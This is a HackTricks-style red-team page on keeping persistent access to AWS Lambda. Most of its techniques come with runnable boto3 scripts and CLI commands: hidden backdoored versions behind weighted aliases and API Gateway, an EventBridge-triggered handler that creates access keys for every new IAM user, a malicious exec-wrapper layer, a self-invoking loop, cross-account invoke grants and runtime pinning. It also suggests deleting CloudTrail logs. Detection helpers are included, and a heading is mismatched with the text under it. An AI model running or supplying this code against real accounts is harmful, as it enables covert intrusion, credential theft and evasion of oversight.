AWS - Lambda Persistence
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Lambda
For more information check:
Lambda Layer Persistence
It's possible to backdoor a layer so that attacker code runs, stealthily, every time the lambda is executed:
AWS - Lambda Layers Persistence
Lambda Extension Persistence
By abusing Lambda Layers it's also possible to abuse extensions: they let you persist in the lambda and, in addition, steal and modify the requests it handles.
AWS - Abusing Lambda Extensions
Via resource policies
It's possible to grant access to different Lambda actions (such as invoke or update code) to external accounts through the function's resource-based policy:
Versions, Aliases & Weights
A Lambda can have different published versions (each version with its own code).
An alias points at one version and can optionally split traffic with a second version by assigning it a weight (routing configuration).
This way an attacker could create a backdoored version 1 and a version 2 with only the legit code, point the alias at version 2 and route only 1% of the requests to version 1 to remain stealthy.
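The weighted-alias trick in code, plus the check a defender would run against it. This is an added example (not code from the HackTricks page); the function name, alias name and version numbers are assumptions, and the live steps in main() need boto3 and credentials while the helpers run offline against a constructed list_aliases() response:

```python
"""Weighted alias backdoor: alias -> legit version, with a small fraction of traffic
routed to a backdoored version. Added example, not HackTricks' own code."""
from __future__ import annotations


def backdoor_routing_config(legit_version: str, backdoor_version: str, fraction: float) -> dict:
    """Build the RoutingConfig for create_alias()/update_alias().

    Lambda constraints: both versions must be published numeric versions (not $LATEST),
    must differ, and the additional weight must be strictly between 0 and 1."""
    for v in (legit_version, backdoor_version):
        if not v.isdigit():
            raise ValueError(f"alias routing needs published numeric versions, got {v!r}")
    if legit_version == backdoor_version:
        raise ValueError("the additional version must differ from the alias's primary version")
    if not 0 < fraction < 1:
        raise ValueError("weight must be strictly between 0 and 1")
    return {"AdditionalVersionWeights": {backdoor_version: fraction}}


def audit_aliases(aliases: list[dict]) -> list[dict]:
    """Flag every alias that splits traffic between two versions.

    `aliases` has the shape of lambda.list_aliases()['Aliases']. A weighted alias is
    legitimate during a canary rollout, so each finding should be reviewed, not auto-deleted."""
    findings = []
    for alias in aliases:
        weights = alias.get("RoutingConfig", {}).get("AdditionalVersionWeights", {})
        for version, weight in weights.items():
            findings.append({
                "alias": alias["Name"],
                "primary": alias["FunctionVersion"],
                "shadow_version": version,
                "weight": weight,
            })
    return findings


# Constructed list_aliases() output: "prod" is the scenario from the text (1% to version 1).
SAMPLE_ALIASES = [
    {"Name": "prod", "FunctionVersion": "2",
     "RoutingConfig": {"AdditionalVersionWeights": {"1": 0.01}}},
    {"Name": "dev", "FunctionVersion": "2"},
]


def main(function_name: str = "target-fn", region: str = "us-east-1") -> None:
    """Live steps (assumed names). Version 1 = backdoored, version 2 = legit code."""
    import boto3  # imported here so the offline helpers work without boto3 installed

    lam = boto3.client("lambda", region_name=region)
    lam.update_alias(
        FunctionName=function_name,
        Name="prod",
        FunctionVersion="2",
        RoutingConfig=backdoor_routing_config("2", "1", 0.01),
    )
    # Defender side: the same API exposes the split.
    for finding in audit_aliases(lam.list_aliases(FunctionName=function_name)["Aliases"]):
        print(finding)


if __name__ == "__main__":
    main()
```

Only published versions can be routed to, so $LATEST is never part of the split; the weight applies to the additional version, which is why the alias's FunctionVersion stays on the legit version 2.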
Version Backdoor + API Gateway
- Copy the original code of the Lambda
- Create a new version backdooring the original code (or just with malicious code): update the function code ($LATEST) and publish it as a version (version 1 in this scenario)
- Call the API Gateway related to the Lambda to execute the code
- Create a new version with the original code: update $LATEST back to the original code and publish it again (version 2)
- This hides the backdoored code in a previous version, while $LATEST and the newest version look clean
- Go to the API Gateway and create a new POST method (or choose any other method) that will execute the backdoored version of the lambda:
arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1 - Note the trailing :1 in the ARN indicating the version of the function (version 1 is the backdoored one in this scenario).
- Select the created POST method and in Actions select Deploy API - Now, when you call the function via POST your backdoor will be invoked
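The same procedure done from code instead of the console, together with a parser that spots integrations pinned to a specific version. This is an added example, not code from the page: the API id, resource id, path and account id are assumptions, and one detail worth knowing is that the Lambda resource policy must allow apigateway.amazonaws.com on the qualified ARN (version :1), since a permission granted on the unqualified function does not cover invocations of a specific version:

```python
"""Version backdoor behind API Gateway: integration URI + qualified permission + detection.
Added example, not HackTricks' own code."""
from __future__ import annotations

import re
from typing import Optional


def qualified_arn(function_arn: str, qualifier: str) -> str:
    """Append a version number or alias to an unqualified Lambda function ARN."""
    parts = function_arn.split(":")
    if len(parts) != 7 or parts[5] != "function":
        raise ValueError(f"expected an unqualified function ARN, got {function_arn!r}")
    return f"{function_arn}:{qualifier}"


def integration_uri(function_arn: str, qualifier: str) -> str:
    """REST API Lambda integration URI; the version rides inside the function ARN."""
    region = function_arn.split(":")[3]
    return (f"arn:aws:apigateway:{region}:lambda:path/2015-03-31/functions/"
            f"{qualified_arn(function_arn, qualifier)}/invocations")


_INTEGRATION_RE = re.compile(
    r"^arn:aws:apigateway:[^:]+:lambda:path/2015-03-31/functions/"
    r"(arn:aws:lambda:[^:]+:\d{12}:function:[^:/]+)(?::([^/]+))?/invocations$"
)


def integration_target(uri: str) -> tuple[str, Optional[str]]:
    """Return (unqualified function ARN, qualifier-or-None) from an integration URI."""
    m = _INTEGRATION_RE.match(uri)
    if not m:
        raise ValueError(f"not a Lambda integration URI: {uri!r}")
    return m.group(1), m.group(2)


def pinned_integrations(integrations: dict[str, str], allowed_qualifiers: tuple[str, ...] = ()) -> list[dict]:
    """Flag methods whose integration targets a numeric version (or an unexpected alias).

    `integrations` maps "METHOD /path" -> integration URI, as collected with get_integration()."""
    out = []
    for method, uri in integrations.items():
        fn, qual = integration_target(uri)
        if qual is not None and qual not in allowed_qualifiers:
            out.append({"method": method, "function": fn, "qualifier": qual})
    return out


# Constructed get_integration() results: the backdoored POST from the text plus a clean GET.
FN_ARN = "arn:aws:lambda:us-east-1:123456789012:function:target-fn"
SAMPLE_INTEGRATIONS = {
    "POST /admin": integration_uri(FN_ARN, "1"),
    "GET /health": f"arn:aws:apigateway:us-east-1:lambda:path/2015-03-31/functions/{FN_ARN}/invocations",
}


def main(api_id: str = "abc123def4", resource_id: str = "r1s2t3", path: str = "/admin",
         region: str = "us-east-1", account: str = "123456789012") -> None:
    """Live steps with assumed ids: wire POST {path} to version 1 and deploy."""
    import boto3

    apigw = boto3.client("apigateway", region_name=region)
    lam = boto3.client("lambda", region_name=region)
    apigw.put_method(restApiId=api_id, resourceId=resource_id, httpMethod="POST", authorizationType="NONE")
    apigw.put_integration(restApiId=api_id, resourceId=resource_id, httpMethod="POST",
                          type="AWS_PROXY", integrationHttpMethod="POST",
                          uri=integration_uri(FN_ARN, "1"))
    # Permission must be granted on the qualified ARN (Qualifier="1") or API Gateway gets 403.
    lam.add_permission(FunctionName=FN_ARN, Qualifier="1", StatementId="apigw-v1",
                       Action="lambda:InvokeFunction", Principal="apigateway.amazonaws.com",
                       SourceArn=f"arn:aws:execute-api:{region}:{account}:{api_id}/*/POST{path}")
    apigw.create_deployment(restApiId=api_id, stageName="prod")


if __name__ == "__main__":
    main()
```

A defender can feed every method's get_integration() URI into pinned_integrations(): production integrations normally point at the unqualified function or a named alias, so a method pinned to a bare version number is worth a look.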
Cron/Event actuator
The fact that you can make Lambda functions run when something happens, or after a certain amount of time, makes Lambda a common and useful way to obtain persistence and evade detection.
Here are some ideas for making your presence in AWS stealthier by creating lambdas.
- Every time a new user is created, a lambda generates a new access key for it and sends it to the attacker.
- Every time a new role is created, a lambda grants assume-role permissions to compromised users.
- Every time new CloudTrail logs are generated, delete/alter them.
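The first idea above, wired up: an EventBridge rule that fires on the CloudTrail record for iam:CreateUser and targets a Lambda, plus a small local matcher so the pattern can be tested against a sample event before deploying. This is an added example, not HackTricks code; the rule name, function ARN and the event below are constructed, and the matcher only implements exact-match semantics (no prefix/anything-but filters). Note that IAM is a global service, so its CloudTrail events reach EventBridge in us-east-1:

```python
"""EventBridge-triggered persistence: rule on IAM CreateUser -> Lambda.
Added example, not HackTricks' own code."""
from __future__ import annotations

import json

# EventBridge pattern for the CloudTrail record of iam:CreateUser.
CREATE_USER_PATTERN = {
    "source": ["aws.iam"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {"eventSource": ["iam.amazonaws.com"], "eventName": ["CreateUser"]},
}

# Constructed event in the shape EventBridge delivers for CloudTrail API calls.
SAMPLE_EVENT = {
    "version": "0",
    "source": "aws.iam",
    "detail-type": "AWS API Call via CloudTrail",
    "region": "us-east-1",
    "detail": {
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateUser",
        "requestParameters": {"userName": "new-dev"},
    },
}


def matches(pattern: dict, event: dict) -> bool:
    """Minimal EventBridge matcher: every pattern key must exist in the event, list values are
    exact-match alternatives (any element of a list-valued event field may match), and nested
    dicts recurse."""
    for key, allowed in pattern.items():
        if key not in event:
            return False
        value = event[key]
        if isinstance(allowed, dict):
            if not isinstance(value, dict) or not matches(allowed, value):
                return False
        else:
            values = value if isinstance(value, list) else [value]
            if not any(v in allowed for v in values):
                return False
    return True


def new_user_name(event: dict) -> str:
    """Pull the created user's name out of the CloudTrail requestParameters."""
    return event["detail"]["requestParameters"]["userName"]


def handler(event, context):
    """Lambda handler for the rule target: mint an access key for the new user.
    Delivery of the key to the attacker is left out; the returned dict is what would be sent."""
    import boto3

    user = new_user_name(event)
    key = boto3.client("iam").create_access_key(UserName=user)["AccessKey"]
    return {"UserName": user, "AccessKeyId": key["AccessKeyId"], "SecretAccessKey": key["SecretAccessKey"]}


def install_rule(function_arn: str, rule_name: str = "iam-user-sync", region: str = "us-east-1") -> str:
    """Create the rule, point it at the function and let events.amazonaws.com invoke it."""
    import boto3

    events = boto3.client("events", region_name=region)
    lam = boto3.client("lambda", region_name=region)
    rule_arn = events.put_rule(Name=rule_name, EventPattern=json.dumps(CREATE_USER_PATTERN), State="ENABLED")["RuleArn"]
    events.put_targets(Rule=rule_name, Targets=[{"Id": "fn", "Arn": function_arn}])
    # Without this resource-policy statement EventBridge cannot invoke the function.
    lam.add_permission(FunctionName=function_arn, StatementId=f"{rule_name}-invoke",
                       Action="lambda:InvokeFunction", Principal="events.amazonaws.com", SourceArn=rule_arn)
    return rule_arn


if __name__ == "__main__":
    assert matches(CREATE_USER_PATTERN, SAMPLE_EVENT)
    install_rule("arn:aws:lambda:us-east-1:123456789012:function:user-sync")
```

The function's execution role needs iam:CreateAccessKey for the handler to work; the same EventBridge PutRule/PutTargets calls are themselves CloudTrail events, which is what a defender should alert on.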
RCE abusing AWS_LAMBDA_EXEC_WRAPPER + Lambda Layers
Abuse the environment variable AWS_LAMBDA_EXEC_WRAPPER to execute an attacker-controlled wrapper script before the runtime/handler starts. Deliver the wrapper via a Lambda Layer at /opt/bin/htwrap, set AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap, and then invoke the function. The wrapper runs inside the function runtime process, inherits the function execution role, and finally execs the real runtime so the original handler still executes normally.
AWS - Lambda Exec Wrapper Persistence
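How the wrapper layer is built and how it is found afterwards. This is an added example, not code from the page or the AWS docs: the layer name, function name and runtime are assumptions, and the wrapper script itself is a hypothetical one that only shows the contract Lambda imposes (the runtime's start command arrives as the arguments and must be exec'd last, and the file must be executable inside the zip or the INIT phase fails):

```python
"""AWS_LAMBDA_EXEC_WRAPPER persistence: build the layer zip and audit for it.
Added example, not HackTricks' own code."""
from __future__ import annotations

import io
import stat
import zipfile

# Hypothetical wrapper. Lambda runs it as: /opt/bin/htwrap <runtime start command...>
WRAPPER_SCRIPT = """#!/bin/bash
# Runs before the runtime starts, inside the sandbox, with the function's execution role.
args=("$@")
# attacker logic would go here (the example does nothing extra)
exec "${args[@]}"   # hand over to the real runtime so the handler still runs normally
"""


def build_wrapper_layer(path: str = "bin/htwrap") -> bytes:
    """Return a layer zip whose only entry is the wrapper at bin/<name> (-> /opt/bin/<name>)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        info = zipfile.ZipInfo(path)
        info.external_attr = (stat.S_IFREG | 0o755) << 16  # executable bit is mandatory
        zf.writestr(info, WRAPPER_SCRIPT)
    return buf.getvalue()


def layer_file_modes(layer_zip: bytes) -> dict[str, int]:
    """Map each zip entry to its unix permission bits (what Lambda will see under /opt)."""
    with zipfile.ZipFile(io.BytesIO(layer_zip)) as zf:
        return {i.filename: (i.external_attr >> 16) & 0o777 for i in zf.infolist()}


def wrapper_findings(function_configs: list[dict]) -> list[dict]:
    """Flag functions whose environment sets AWS_LAMBDA_EXEC_WRAPPER.

    Input has the shape of lambda.get_function_configuration(); legitimate users of this
    variable (APM agents) exist, so report the wrapper path and layers for review."""
    out = []
    for cfg in function_configs:
        wrapper = cfg.get("Environment", {}).get("Variables", {}).get("AWS_LAMBDA_EXEC_WRAPPER")
        if wrapper:
            out.append({"function": cfg["FunctionName"], "wrapper": wrapper,
                        "layers": [layer["Arn"] for layer in cfg.get("Layers", [])]})
    return out


# Constructed get_function_configuration() responses.
SAMPLE_CONFIGS = [
    {"FunctionName": "target-fn",
     "Environment": {"Variables": {"AWS_LAMBDA_EXEC_WRAPPER": "/opt/bin/htwrap", "STAGE": "prod"}},
     "Layers": [{"Arn": "arn:aws:lambda:us-east-1:123456789012:layer:htwrap:1"}]},
    {"FunctionName": "clean-fn", "Environment": {"Variables": {"STAGE": "prod"}}},
]


def main(function_name: str = "target-fn", region: str = "us-east-1") -> None:
    """Live steps (assumed names): publish the layer and attach it with the env var."""
    import boto3

    lam = boto3.client("lambda", region_name=region)
    layer_arn = lam.publish_layer_version(LayerName="htwrap", Content={"ZipFile": build_wrapper_layer()},
                                          CompatibleRuntimes=["python3.12"])["LayerVersionArn"]
    current = lam.get_function_configuration(FunctionName=function_name)
    # update_function_configuration replaces Layers and Environment wholesale: merge, don't overwrite,
    # or the function breaks and the change gets noticed.
    layers = [layer["Arn"] for layer in current.get("Layers", [])] + [layer_arn]
    env = dict(current.get("Environment", {}).get("Variables", {}), AWS_LAMBDA_EXEC_WRAPPER="/opt/bin/htwrap")
    lam.update_function_configuration(FunctionName=function_name, Layers=layers, Environment={"Variables": env})


if __name__ == "__main__":
    main()
```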
AWS - Lambda Function URL Public Exposure
Abuse Lambda asynchronous destinations together with the Recursion configuration to make a function continually re-invoke itself with no external scheduler (no EventBridge, cron, etc.). By default, Lambda terminates recursive loops, but setting the recursion config to Allow re-enables them. Destinations deliver on the service side for async invokes, so a single seed invoke creates a stealthy, code-free heartbeat/backdoor channel. Optionally throttle with reserved concurrency to keep noise low.
AWS - Lambda Async Self Loop Persistence
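The self-loop expressed as the two configuration calls it consists of, with the check that detects it. This is an added example, not HackTricks code; the function ARN is an assumption. Two caveats a practitioner hits in practice: destinations only fire for asynchronous invocations, so the seed must use InvocationType="Event", and the execution role needs lambda:InvokeFunction on the function itself or the destination delivery silently fails:

```python
"""Async destination self-loop (OnSuccess -> same function, RecursiveLoop=Allow).
Added example, not HackTricks' own code."""
from __future__ import annotations

FN_ARN = "arn:aws:lambda:us-east-1:123456789012:function:heartbeat"  # assumed


def _unqualified(arn: str) -> str:
    """Drop a trailing version/alias so arn:...:function:fn:3 compares equal to arn:...:function:fn."""
    return ":".join(arn.split(":")[:7])


def self_loop_params(function_arn: str) -> tuple[dict, dict]:
    """kwargs for put_function_recursion_config() and put_function_event_invoke_config()."""
    recursion = {"FunctionName": function_arn, "RecursiveLoop": "Allow"}
    destination = {
        "FunctionName": function_arn,
        "MaximumRetryAttempts": 0,  # retries would only add noise; the loop re-seeds itself anyway
        "DestinationConfig": {"OnSuccess": {"Destination": function_arn}},
    }
    return recursion, destination


def loop_findings(function_arn: str, recursion_cfg: dict, event_invoke_cfg: dict) -> list[str]:
    """Reasons a function looks like a self-loop, from get_function_recursion_config()
    and get_function_event_invoke_config() responses. Both together are the attack;
    either alone is worth a look."""
    reasons = []
    if recursion_cfg.get("RecursiveLoop") == "Allow":
        reasons.append("recursive loops allowed")
    dest_cfg = event_invoke_cfg.get("DestinationConfig", {})
    for outcome in ("OnSuccess", "OnFailure"):
        dest = dest_cfg.get(outcome, {}).get("Destination", "")
        if dest and _unqualified(dest) == _unqualified(function_arn):
            reasons.append(f"{outcome} destination is the function itself")
    return reasons


# Constructed API responses for a looping function.
SAMPLE_RECURSION_CFG = {"RecursiveLoop": "Allow"}
SAMPLE_EVENT_INVOKE_CFG = {"FunctionArn": FN_ARN,
                           "DestinationConfig": {"OnSuccess": {"Destination": FN_ARN + ":1"}}}


def main(function_arn: str = FN_ARN, region: str = "us-east-1") -> None:
    """Live steps: allow recursion, point OnSuccess at itself, pace with concurrency 1, seed once."""
    import boto3

    lam = boto3.client("lambda", region_name=region)
    recursion, destination = self_loop_params(function_arn)
    lam.put_function_recursion_config(**recursion)
    lam.put_function_event_invoke_config(**destination)
    lam.put_function_concurrency(FunctionName=function_arn, ReservedConcurrentExecutions=1)
    lam.invoke(FunctionName=function_arn, InvocationType="Event", Payload=b"{}")  # the single seed


if __name__ == "__main__":
    main()
```

With the default RecursiveLoop=Terminate Lambda would cut the chain after a handful of iterations; PutFunctionRecursionConfig with Allow is therefore the CloudTrail event to alert on, together with PutFunctionEventInvokeConfig whose destination equals the function's own ARN.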
AWS - Lambda Alias-Scoped Resource Policy Backdoor
Create a hidden Lambda version with attacker logic and scope a resource-based policy to that specific version (or alias) using the --qualifier parameter in lambda add-permission. Grant only lambda:InvokeFunction on arn:aws:lambda:REGION:ACCT:function:FN:VERSION to an attacker principal. Normal invocations via the function name or primary alias remain unaffected, while the attacker can directly invoke the backdoored version ARN.
This is stealthier than exposing a Function URL and doesn't change the primary traffic alias.
AWS - Lambda Alias Version Policy Backdoor
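One example covers both resource-policy techniques on this page: the cross-account grant from the "Via resource policies" section and the qualifier-scoped invoke grant described just above, followed by the policy review a defender would run over get_policy() output. This is an added example, not HackTricks code; the account ids, function name and the policy document below are constructed:

```python
"""Lambda resource-policy backdoors (external principal, version-scoped) and their review.
Added example, not HackTricks' own code."""
from __future__ import annotations

import json
from typing import Optional


def external_permission(function_name: str, principal: str, action: str = "lambda:InvokeFunction",
                        qualifier: Optional[str] = None, statement_id: str = "ext-access") -> dict:
    """kwargs for lambda.add_permission(). `principal` is an account id or IAM ARN;
    with `qualifier` the statement applies only to that version or alias."""
    params = {"FunctionName": function_name, "StatementId": statement_id,
              "Action": action, "Principal": principal}
    if qualifier:
        params["Qualifier"] = qualifier
    return params


def _principals(principal) -> list[tuple[str, str]]:
    """Normalise a statement Principal into (kind, identifier) pairs."""
    if principal == "*":
        return [("*", "*")]
    pairs = []
    for kind, ids in principal.items():
        for ident in (ids if isinstance(ids, list) else [ids]):
            pairs.append((kind, ident))
    return pairs


def _account_of(ident: str) -> str:
    return ident.split(":")[4] if ident.startswith("arn:") else ident


def policy_findings(policy_json: str, own_account: str) -> list[dict]:
    """Flag statements granting a foreign AWS principal (or *), and statements pinned to a
    version/alias. `policy_json` is lambda.get_policy()['Policy']."""
    findings = []
    for st in json.loads(policy_json).get("Statement", []):
        reasons = []
        for kind, ident in _principals(st.get("Principal", {})):
            if kind == "*" or (kind == "AWS" and _account_of(ident) != own_account):
                reasons.append(f"foreign principal {ident}")
        parts = st.get("Resource", "").split(":")
        qualifier = parts[7] if len(parts) == 8 else None
        if qualifier:
            reasons.append(f"scoped to qualifier {qualifier}")
        if reasons:
            findings.append({"sid": st.get("Sid"), "action": st.get("Action"),
                             "qualifier": qualifier, "reasons": reasons})
    return findings


# Constructed get_policy() document: a normal API Gateway statement plus the backdoor.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "apigw", "Effect": "Allow", "Principal": {"Service": "apigateway.amazonaws.com"},
         "Action": "lambda:InvokeFunction",
         "Resource": "arn:aws:lambda:us-east-1:123456789012:function:target-fn"},
        {"Sid": "ext-access", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999999999999:root"},
         "Action": "lambda:InvokeFunction",
         "Resource": "arn:aws:lambda:us-east-1:123456789012:function:target-fn:3"},
    ],
})


def main(function_name: str = "target-fn", attacker_account: str = "999999999999", region: str = "us-east-1") -> None:
    """Live steps (assumed names): grant invoke on hidden version 3 only, then review the policy."""
    import boto3

    lam = boto3.client("lambda", region_name=region)
    lam.add_permission(**external_permission(function_name, attacker_account, qualifier="3"))
    own = boto3.client("sts").get_caller_identity()["Account"]
    for f in policy_findings(lam.get_policy(FunctionName=function_name)["Policy"], own):
        print(f)
```

get_policy() with no Qualifier returns the unqualified function's policy; statements added with a qualifier live on that version or alias and only show up in get_policy(FunctionName=..., Qualifier=...), so a complete review iterates over list_versions_by_function() and list_aliases() as well.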
Freezing AWS Lambda Runtimes
An attacker holding the lambda:InvokeFunction, logs:FilterLogEvents, lambda:PutRuntimeManagementConfig and lambda:GetRuntimeManagementConfig permissions can modify a function's runtime management configuration. This is especially effective when the goal is to keep a Lambda function on a vulnerable runtime version, or to preserve compatibility with malicious layers that might break on newer runtimes.
The attacker changes the runtime management configuration to pin the runtime version:
# Invoke the function to generate runtime logs
aws lambda invoke \
--function-name $TARGET_FN \
--payload '{}' \
--region us-east-1 /tmp/ping.json
sleep 5
# Freeze automatic runtime updates on function update
aws lambda put-runtime-management-config \
--function-name $TARGET_FN \
--update-runtime-on FunctionUpdate \
--region us-east-1
Verify the applied configuration:
aws lambda get-runtime-management-config \
--function-name $TARGET_FN \
--region us-east-1
Optional: pin to a specific runtime version
# Extract Runtime Version ARN from INIT_START logs
RUNTIME_ARN=$(aws logs filter-log-events \
--log-group-name /aws/lambda/$TARGET_FN \
--filter-pattern "INIT_START" \
--query 'events[0].message' \
--output text | grep -o 'Runtime Version ARN: [^,]*' | cut -d' ' -f4)
Pin to a specific runtime version:
aws lambda put-runtime-management-config \
--function-name $TARGET_FN \
--update-runtime-on Manual \
--runtime-version-arn $RUNTIME_ARN \
--region us-east-1
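The same pinning done from code, with the INIT_START parsing the shell pipeline above relies on made explicit, and the check that finds pinned functions. This is an added example, not code from the page: the function name is an assumption, the log line is constructed in the shape Lambda writes (the runtime version hash in it is made up), and the audit treats anything other than UpdateRuntimeOn=Auto as worth reviewing because Auto is the default and the only mode in which Lambda patches the runtime on its own:

```python
"""Runtime pinning via PutRuntimeManagementConfig: parse INIT_START, pin, audit.
Added example, not HackTricks' own code."""
from __future__ import annotations

import re
from typing import Optional

# Constructed INIT_START line (tab-separated fields, as CloudWatch shows it; hash is made up).
SAMPLE_INIT_START = (
    "INIT_START Runtime Version: python:3.12.v30\t"
    "Runtime Version ARN: arn:aws:lambda:us-east-1::runtime:"
    "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef\n"
)

_RUNTIME_ARN_RE = re.compile(r"Runtime Version ARN: (arn:aws:lambda:[^\s,]+)")


def runtime_version_arn(init_start_message: str) -> Optional[str]:
    """Extract the runtime version ARN from an INIT_START log message (None if absent)."""
    m = _RUNTIME_ARN_RE.search(init_start_message)
    return m.group(1) if m else None


def pin_params(function_name: str, runtime_arn: Optional[str]) -> dict:
    """kwargs for put_runtime_management_config(): Manual needs the ARN, FunctionUpdate does not."""
    if runtime_arn:
        return {"FunctionName": function_name, "UpdateRuntimeOn": "Manual", "RuntimeVersionArn": runtime_arn}
    return {"FunctionName": function_name, "UpdateRuntimeOn": "FunctionUpdate"}


def pinned_functions(configs: dict[str, dict]) -> list[dict]:
    """Flag functions not on automatic runtime updates.

    `configs` maps function name -> get_runtime_management_config() response."""
    out = []
    for name, cfg in configs.items():
        mode = cfg.get("UpdateRuntimeOn", "Auto")
        if mode != "Auto":
            out.append({"function": name, "mode": mode, "runtime_arn": cfg.get("RuntimeVersionArn")})
    return out


# Constructed get_runtime_management_config() responses.
SAMPLE_RUNTIME_CONFIGS = {
    "target-fn": {"UpdateRuntimeOn": "Manual", "RuntimeVersionArn": runtime_version_arn(SAMPLE_INIT_START)},
    "clean-fn": {"UpdateRuntimeOn": "Auto"},
}


def main(function_name: str = "target-fn", region: str = "us-east-1") -> None:
    """Live steps (assumed name): invoke, read the ARN from the logs, pin, verify."""
    import boto3

    lam = boto3.client("lambda", region_name=region)
    logs = boto3.client("logs", region_name=region)
    lam.invoke(FunctionName=function_name, Payload=b"{}")  # forces an INIT_START if cold
    events = logs.filter_log_events(logGroupName=f"/aws/lambda/{function_name}",
                                    filterPattern="INIT_START", limit=1)["events"]
    arn = runtime_version_arn(events[0]["message"]) if events else None
    lam.put_runtime_management_config(**pin_params(function_name, arn))
    print(lam.get_runtime_management_config(FunctionName=function_name))


if __name__ == "__main__":
    main()
```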

